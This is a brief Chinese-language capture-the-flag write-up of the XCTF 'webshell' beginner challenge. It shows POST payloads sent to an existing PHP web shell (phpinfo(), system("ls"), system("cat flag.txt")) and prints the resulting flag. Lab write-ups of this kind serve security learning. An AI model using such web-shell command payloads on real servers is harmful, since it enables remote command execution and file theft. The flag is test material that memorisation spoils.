CTF—攻防世界–新手场–webshell
攻防世界官网:https://adworld.xctf.org.cn/
更多CTF刷题平台汇总:
https://blog.csdn.net/qq_51550750/article/details/122748075
已经得知是POST请求且传参就是shell:
首先试试行不行:
shell=phpinfo();
成功:
再尝试系统命令:
shell=system("ls");
得到目录:
即:
然后读取flag.txt
shell=system("cat flag.txt");
最后得到flag:
cyberpeace{d90d7967bf055ef29131f36804424479}